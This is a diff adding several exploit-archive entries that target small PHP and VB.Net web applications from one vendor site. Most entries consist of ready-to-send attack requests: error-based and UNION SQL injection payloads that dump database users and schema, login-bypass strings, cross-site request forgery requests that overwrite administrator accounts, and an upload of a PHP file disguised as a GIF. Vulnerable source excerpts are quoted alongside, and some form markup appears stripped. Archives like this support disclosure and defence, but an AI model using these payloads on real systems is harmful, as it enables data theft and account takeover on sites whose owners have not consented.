+Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/submit_feedback.php +# +POST /[PATH]/submit_feedback.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 278 +b_name=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit +HTTP/1.1 200 OK +Date: Mon, 29 Oct 2018 00:58:04 GMT +Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/7.1.22 +X-Powered-By: PHP/7.1.22 +Content-Length: 1315 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 3) +# http://localhost/[PATH]/submit_feedback.php +# +POST /[PATH]/submit_feedback.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 280 +sem_name=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit +HTTP/1.1 200 OK +Date: Mon, 29 Oct 2018 00:58:15 GMT +Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/7.1.22 +X-Powered-By: PHP/7.1.22 +Content-Length: 1313 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 4) +# http://localhost/[PATH]/submit_feedback.php +# +POST /[PATH]/submit_feedback.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 280 +division=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit +HTTP/1.1 200 OK +Date: Mon, 29 Oct 2018 00:58:26 GMT +Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/7.1.22 +X-Powered-By: PHP/7.1.22 +Content-Length: 1313 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 5) +# http://localhost/[PATH]/submit_feedback.php +# +POST /[PATH]/submit_feedback.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 279 +roll_no=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit +HTTP/1.1 200 OK +Date: Mon, 29 Oct 2018 00:58:33 GMT +Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/7.1.22 +X-Powered-By: PHP/7.1.22 +Content-Length: 1314 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45713.txt b/exploits/php/webapps/45713.txt new file mode 100644 index 000000000..5e43e53e1 --- /dev/null +++ b/exploits/php/webapps/45713.txt @@ -0,0 +1,37 @@ +# Exploit Title: Card Payment 1.0 - Cross-Site Request Forgery (Update Admin) +# Dork: N/A +# Date: 2018-10-29 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.sourcecodester.com/users/janobe +# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/tubigangarden.zip +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/admin/mod_users/controller.php?action=edit +# +POST /[PATH]/admin/mod_users/controller.php?action=edit HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 106 +USERID=1&UNAME=Anonymous&USERNAME=admin&deptid=&UPASS=Efe&ROLE=Administrator&deptid=&PHONE=912856478&save= +HTTP/1.1 200 OK +Date: Sun, 28 Oct 2018 20:16:05 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 57 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45717.txt b/exploits/php/webapps/45717.txt new file mode 100644 index 000000000..6f77e2d96 --- /dev/null +++ b/exploits/php/webapps/45717.txt @@ -0,0 +1,11 @@ +# Exploit Title: MOGG web simulator Script - SQL Injection +# Date: 2018-10-29 +# Exploit Author: Meisam Monsef - meisamrce@gmail.com - @meisamrce - +@dorsateam +# Vendor Homepage: https://github.com/spider312/mtgas +# Version: All Version + + +Exploit : +http://server/play.php?id=99999'+[SQL Command]+# +http://server/play.php?id=99999%27+and+extractvalue(1,concat(0x3a,user(),0x3a))%23 \ No newline at end of file diff --git a/exploits/php/webapps/45718.txt b/exploits/php/webapps/45718.txt new file mode 100644 index 000000000..94f4d6b6b --- /dev/null +++ b/exploits/php/webapps/45718.txt @@ -0,0 +1,56 @@ +# Exploit Title: Aplaya Beach Resort Online Reservation System 1.0 - Multiple Vulnerabilities +# Dork: N/A +# Date: 2018-10-29 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.sourcecodester.com/users/janobe +# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/aplaya.zip +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/admin/mod_users/controller.php?action=edit +# +POST /[PATH]/admin/mod_users/controller.php?action=edit HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 114 +account_id=5&name=Janno%2BPalacios&deptid=&username=efe%40omerefe.com&deptid=&pass=efe&type=Administrator&save= +HTTP/1.1 200 OK +Date: Mon, 29 Oct 2018 08:20:21 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Set-Cookie: PHPSESSID=7v7av68r870gj66ouhf1sk3260; path=/ +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 57 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/admin/mod_room/controller.php?action=editimage +# + + +
+ + +
+ + + +# POC: +# 3) +# http://localhost/[PATH]/admin/mod_room/index.php?view=view&id=[SQL] +# +#.... \ No newline at end of file diff --git a/exploits/php/webapps/45719.txt b/exploits/php/webapps/45719.txt new file mode 100644 index 000000000..27261207c --- /dev/null +++ b/exploits/php/webapps/45719.txt @@ -0,0 +1,119 @@ +# Exploit Title: Curriculum Evaluation System 1.0 - SQL Injection +# Dork: N/A +# Date: 2018-10-29 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.sourcecodester.com/users/janobe +# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/curriculumevaluationsystem_0.zip +# Version: 1.0 +# Category: Windows +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-18803 + +# POC: +# 1) +# User: 'or 1=1 or ''=' +# ' AnD EXTRAcTVaLUE(22,CoNCaT(0x5c,veRSion(),(SElECT (ElT(1=1,1))),database()))-- Efe + +# POC: +# 2) +# User: 'or 1=1 or ''=' +# Pass: Null +# +# https://2.bp.blogspot.com/-4O0oZTFkzJE/W9Y4HWcImQI/AAAAAAAAEN4/5P-n-9H6JAQMiN6UpJu340xI4x_-MSjHACLcBGAs/s1600/sql5.png + +#[PATH]/frmCourse.vb +#.... +#47 Private Sub txtSearch_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles txtSearch.TextChanged +#48 sql = "Select * From tblcourse WHERE Course Like '%" & txtSearch.Text & "%'" +#49 reloadDtg(sql, dtglist) +#50 End Sub +#.... + +#[PATH]/includes/user.vb +#.... +#05 Public Sub login(ByVal username As Object, ByVal pass As Object) +#06 Try +#07 +#08 con.Open() +#09 reloadtxt("SELECT * FROM `tbluseraccount` WHERE User_name= '" & username & "' and Pass = sha1('" & pass & "')") +#10 +#11 +#12 If dt.Rows.Count > 0 Then +#13 If dt.Rows(0).Item("UserType") = "Administrator" Then +#14 MsgBox("Welcome " & dt.Rows(0).Item("UserType")) +#15 'Form1.Text = "User :" & dt.Rows(0).Item("Fullname") +#16 With Form1 +#17 .tsAddG.Enabled = True +#18 .tsStudent.Enabled = True +#19 .tsCurriculum.Enabled = True +#20 .tsGrades.Enabled = True +#21 .tsReport.Enabled = True +#22 .tsUtilities.Enabled = True +#23 .tsSearchStudent.Enabled = True +#24 .tsLogin.Image = My.Resources.logout +#25 .tsLogin.Text = "Logout" +#26 End With +#27 +#28 +#29 LoginForm1.Close() +#30 +#31 +#32 ElseIf dt.Rows(0).Item("UserType") = "Faculty" Then +#33 +#34 MsgBox("Welcome " & dt.Rows(0).Item("UserType")) +#35 'Form1.Text = "User :" & dt.Rows(0).Item("Fullname") +#36 With Form1 +#37 .tsAddG.Enabled = True +#38 .tsStudent.Enabled = True +#39 .tsCurriculum.Enabled = True +#40 .tsGrades.Enabled = True +#41 .tsReport.Enabled = True +#42 .tsSearchStudent.Enabled = True +#43 .tsLogin.Image = My.Resources.logout +#44 .tsLogin.Text = "Logout" +#45 End With +#46 +#47 +#48 +#49 +#50 LoginForm1.Close() +#51 +#52 +#53 +#54 ElseIf dt.Rows(0).Item("UserType") = "Assistant" Then +#55 MsgBox("Welcome " & dt.Rows(0).Item("UserType")) +#56 'With Form1 +#57 With Form1 +#58 .tsAddG.Enabled = True +#59 .tsStudent.Enabled = True +#60 .tsCurriculum.Enabled = True +#61 .tsGrades.Enabled = True +#62 .tsReport.Enabled = True +#63 +#64 .tsSearchStudent.Enabled = True +#65 .tsLogin.Image = My.Resources.logout +#66 .tsLogin.Text = "Logout" +#67 End With +#68 +#69 +#70 LoginForm1.Close() +#71 End If +#72 +#73 'Form1.UserIdToolStripStatus.Text = dt.Rows(0).Item("UserId") +#74 'Form1.UserToolStripStatus.Text = dt.Rows(0).Item("Fullname") +#75 'Form1.StatusStrip1.Visible = True +#76 'inserting logs +#77 'sql = "INSERT INTO `tbllogs` (`UserId`, `LogDate`,LogMode) " & _ +#78 ' " VALUES ('" & dt.Rows(0).Item("UserId") & "',Now(),'Logged in')" +#79 'create(sql) +#80 +#81 Else +#82 MsgBox("Acount doest not exist!", MsgBoxStyle.Information) +#83 End If +#84 Catch ex As Exception +#85 MsgBox(ex.Message) +#86 End Try +#87 con.Close() +#88 da.Dispose() +#89 End Sub +#.... \ No newline at end of file diff --git a/exploits/php/webapps/45720.txt b/exploits/php/webapps/45720.txt new file mode 100644 index 000000000..dfc9638db --- /dev/null +++ b/exploits/php/webapps/45720.txt @@ -0,0 +1,73 @@ +# Exploit Title: Bakeshop Inventory System in VB.Net and MS Access Database 1.0 - SQL Injection +# Dork: N/A +# Date: 2018-10-29 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.sourcecodester.com/users/janobe +# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/bakeshopinventory1.0.zip +# Version: 1.0 +# Category: Windows +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-18804 + +# POC: +# 1) +# User: 'or 1=1 or ''=' +# Pass: 'or 1=1 or ''=' +# +# https://2.bp.blogspot.com/-xjiRUlpkNGc/W9Ywmp79JpI/AAAAAAAAENs/3UDWxFvuTfcJrEKDU9TUxJRpoT8T6yLLwCLcBGAs/s1600/sql4.png +# +#[PATH]/include/publicfunction.vb +#.... +#237 Public Sub LoginUser(ByVal userid As Object, ByVal pass As Object) +#238 Try +#239 con.Open() +#240 +#241 cmd = New OleDb.OleDbCommand +#242 With cmd +#243 .Connection = con +#244 .CommandText = "SELECT * FROM tblUser WHERE U_UNAME ='" & userid.Text & "' AND U_PASS = '" & pass.Text & "'" +#245 End With +#246 +#247 da = New OleDb.OleDbDataAdapter +#248 da.SelectCommand = cmd +#249 dt = New DataTable +#250 da.Fill(dt) +#251 +#252 If dt.Rows.Count > 0 Then +#253 +#254 If dt.Rows(0).Item("U_TYPE") = "Administrator" Then +#255 +#256 MsgBox("You login as administrator!!") +#257 +#258 ShowForm(LoginForm1, Form1) +#259 +#260 +#261 LoginForm1.Hide() +#262 ElseIf dt.Rows(0).Item("U_TYPE") = "Staff" Then +#263 +#264 MsgBox("You login as Staff!!") +#265 +#266 With Form1 +#267 '.ManageUsersToolStripMenuItem.Visible = False +#268 +#269 End With +#270 +#271 ShowForm(LoginForm1, Form1) +#272 +#273 +#274 LoginForm1.Hide() +#275 End If +#276 +#277 Else +#278 MsgBox("Account does not exists.", MsgBoxStyle.Exclamation) +#279 End If +#280 +#281 Catch ex As Exception +#282 +#283 MsgBox(ex.Message) +#284 Finally +#285 con.Close() +#286 da.Dispose() +#287 End Try +#288 End Sub +#.... \ No newline at end of file diff --git a/exploits/php/webapps/45721.txt b/exploits/php/webapps/45721.txt new file mode 100644 index 000000000..45e986462 --- /dev/null +++ b/exploits/php/webapps/45721.txt @@ -0,0 +1,43 @@ +# Exploit Title: Point of Sales (POS) in VB.Net MySQL Database 1.0 - SQL Injection +# Dork: N/A +# Date: 2018-10-29 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.sourcecodester.com/users/janobe +# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/poinofsales_0.zip +# Version: 1.0 +# Category: Windows +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-18805 + +# POC: +# 1) +# User: '||(SEleCT 'Efe' FRoM DuaL WheRE 113=113 AnD (SEleCT 64 FRom(SELeCT CoUNT(*),ConCAT(ConCAT(0x203a20,UsER(),DAtABAsE(),VErSIoN()),(SelEcT (ELT(64=64,1))),FLooR(RAnD(0)*2))x FrOM INFOrMATIoN_SchEMA.pLUGINS GroUP By x)a))||' +# Pass: Null +# +# https://2.bp.blogspot.com/-qlfhS-GUaCQ/W9Yt3aHdLHI/AAAAAAAAENg/Hmxj2lZ62cYITPlTNaNrwwAgh379Cbi8ACLcBGAs/s1600/sql3.png +# +#[PATH]/LoginForm1.vb +#.... +#11 Private Sub OK_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles OK.Click +#12 sql = "SELECT * FROM `tblemployee` WHERE `USERNAME` ='" & UsernameTextBox.Text & "' and `PASSWRD` = sha1('" & PasswordTextBox.Text & "')" +#13 janobefindthis(sql) +#14 +#15 If GetNumRows() = 1 Then +#16 LoadSingleResult("login") +#17 ' MsgBox(fullname) +#18 Form1.statsloginname.Text = fullname +#19 Form1.tsLogin.Text = "Logout" +#20 +#21 If usertype = "Administrator" Then +#22 Visible_Admin(True) +#23 Else +#24 Visible_Cashier(True) +#25 End If +#26 Else +#27 MsgBox("Username or Password not registered!") +#28 End If +#29 +#30 +#31 Me.Close() +#32 End Sub +#.... \ No newline at end of file diff --git a/exploits/php/webapps/45722.txt b/exploits/php/webapps/45722.txt new file mode 100644 index 000000000..d6bb35273 --- /dev/null +++ b/exploits/php/webapps/45722.txt @@ -0,0 +1,108 @@ +# Exploit Title: School Event Management System 1.0 - SQL Injection +# Dork: N/A +# Date: 2018-10-29 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.sourcecodester.com/users/janobe +# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/sems_1.zip +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-18795 + +# POC: +# 1) +# http://localhost/[PATH]/student/index.php?view=view&id=[SQL] +# +#[PATH]/student/view.php +#01 select_student($_GET['id']); +#04 +#05 +#06 $course = New Course(); +#07 $resCourse = $course->single_course($res->CourseID); +#08 +#09 ?> +GET /[PATH]/student/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2d%2d%20%2d HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 28 Oct 2018 17:02:29 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=82 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/event/index.php?view=view&id=[SQL] +# +#[PATH]/event/view.php +#01 single_event($_GET['id']); +#04 +#05 +#06 +#07 ?> +GET /[PATH]/event/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 28 Oct 2018 17:12:15 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + +# POC: +# 3) +# http://localhost/[PATH]/user/index.php?view=view&id=[SQL] +# +#[PATH]/user/view.php +#01 single_user($_GET['id']); +#04 +#05 +#06 +#07 ?> +GET /[PATH]/user/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 28 Oct 2018 17:16:52 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45723.txt b/exploits/php/webapps/45723.txt new file mode 100644 index 000000000..3c37555eb --- /dev/null +++ b/exploits/php/webapps/45723.txt @@ -0,0 +1,89 @@ +# Exploit Title: School Event Management System 1.0 - Arbitrary File Upload +# Dork: N/A +# Date: 2018-10-29 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.sourcecodester.com/users/janobe +# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/sems_1.zip +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-18793 + +# POC: +# 1) +# http://localhost/[PATH]/event/controller.php?action=photos +# +GIFefe + +# http://localhost/[PATH]/event/photo/[FILE] +# +#[PATH]/event/controller.php +#.... +#29 function doInsert(){ +#30 if(isset($_POST['save'])){ +#31 +#32 +#33 $errofile = $_FILES['image']['error']; +#34 $type = $_FILES['image']['type']; +#35 $temp = $_FILES['image']['tmp_name']; +#36 $myfile =$_FILES['image']['name']; +#37 $location="photo/".$myfile; +#38 +#39 @$file=$_FILES['image']['tmp_name']; +#40 @$image= addslashes(file_get_contents($_FILES['image']['tmp_name'])); +#41 @$image_name= addslashes($_FILES['image']['name']); +#42 @$image_size= getimagesize($_FILES['image']['tmp_name']); +#.... +GET /[PATH]/event/controller.php?action=photos HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 +Connection: keep-alive +Content-Type: multipart/form-data; boundary= +---------------------------3634372676911755021110261466 +Content-Length: 617 +-----------------------------3634372676911755021110261466 +Content-Disposition: form-data; name="EventID" +1 +-----------------------------3634372676911755021110261466 +Content-Disposition: form-data; name="MAX_FILE_SIZE" +1000000 +-----------------------------3634372676911755021110261466 +Content-Disposition: form-data; name="photo"; filename="phpinfo_gif.php" +Content-Type: application/force-download +GIFefe + +-----------------------------3634372676911755021110261466 +Content-Disposition: form-data; name="savephoto" +-----------------------------3634372676911755021110261466-- +HTTP/1.1 200 OK +Date: Sun, 28 Oct 2018 17:27:54 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 143 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) + + +
+ + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/45724.txt b/exploits/php/webapps/45724.txt new file mode 100644 index 000000000..7a19b8ff6 --- /dev/null +++ b/exploits/php/webapps/45724.txt @@ -0,0 +1,84 @@ +# Exploit Title: School Event Management System 1.0 - Cross-Site Request Forgery (Update Admin) +# Dork: N/A +# Date: 2018-10-29 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.sourcecodester.com/users/janobe +# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/sems_1.zip +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-18794 + +# POC: +# 1) +# .../[PATH]user/user/edit.php +#02 if (!isset($_SESSION['ACCOUNT_ID'])){ +#03 redirect(web_root."index.php"); +#04 } +#05 +#06 @$USERID = $_GET['id']; +#07 if($USERID==''){ +#08 redirect("index.php"); +#09 } +#10 $user = New User(); +#11 $singleuser = $user->single_user($USERID); +# .../[PATH]user/controller.php +#80 $user = New User(); +#81 $user->ACCOUNT_NAME = $_POST['U_NAME']; +#82 $user->ACCOUNT_USERNAME = $_POST['U_USERNAME']; +#83 $user->ACCOUNT_PASSWORD =sha1($_POST['U_PASS']); +#84 $user->ACCOUNT_TYPE = $_POST['U_ROLE']; +#85 $user->update($_POST['USERID']); +#86 +#87 message("[". $_POST['U_NAME'] ."] has been updated!", "success"); +#88 redirect("index.php"); +# ... + + +
+ + + + + + + + + + + + + + + + +POST /[PATH]/user/controller.php?action=edit HTTP/1.1 +Host: 192.168.1.27 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 136 +USERID=1&U_NAME=admin_test&deptid=&U_USERNAME=admin_test&deptid=&U_PASS=admin_test&deptid=&RU_PASS=admin_test&U_ROLE=Administrator&save= +HTTP/1.1 200 OK +Date: Sun, 28 Oct 2018 17:57:48 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 128 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +/* `exploitdb`.`useraccounts` */ +$useraccounts = array( + array('ACCOUNT_ID' => '1','ACCOUNT_NAME' => 'admin_test','ACCOUNT_USERNAME' => 'admin_test','ACCOUNT_PASSWORD' => 